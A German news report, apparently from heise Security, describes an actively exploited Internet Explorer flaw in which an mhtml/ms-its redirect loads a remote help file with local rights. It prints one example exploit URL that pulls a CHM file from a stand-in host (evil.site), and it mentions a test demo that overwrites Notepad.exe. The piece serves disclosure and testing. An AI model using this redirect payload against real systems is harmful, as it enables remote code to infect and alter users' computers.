Internet Explorer wieder im Visier
Ein Sicherheitsproblem des Internet Explorer wird aktiv ausgenutzt. Der c't-Browsercheck demonstriert das Problem.
Bereits vor einigen Wochen hatte Thor Larholm auf eine kritische Schwachstelle des Internet Explorer im Umgang mit Hilfedateien hingewiesen. Mittlerweile sind konkrete Details zu dem Sicherheitsproblem veröffentlicht, und erste Würmer und Websites nutzen es aus, um die Rechner von IE-Anwendern zu infizieren. Zum Glück waren die ersten Exemplare recht ineffizient und fanden keine große Verbreitung.
Das Problem lässt sich auf einen simplen Redirect zurückführen. Gibt man in einer mhtml-URL eine Hilfeseite an, die nicht existiert, dann lädt der Internet Explorer eine zweite Hilfedatei und startet diese mit den Rechten der ersten. Existiert C:\foo.mht nicht, so öffnet
ms-its: mhtml:file://C:\foo.mht!http://evil.site/exploit.chm::exploit.htm
die externe Hilfedatei, als wäre es eine lokale. Diese kann dann unter anderem Dateien nachladen und Dateien auf dem lokalen Rechner überschreiben. Betroffen sind alle Versionen des Internet Explorer ab 5.0.1, von Microsoft gibt es bisher keine Stellungnahme zu dem Problem. Auf dem c't-Browsercheck von heise Security können Sie testen, ob Ihr System verwundbar ist. Eine harmlose Version der Demo legt lediglich eine neue Datei an, die "scharfe" überschreibt Notepad.exe und startet dieses Programm.
Siehe dazu auch: (ju)
- Demo zu mtml-Redirects auf dem c't-Browsercheck
- Details zur Schwachstelle auf SecurityFocus
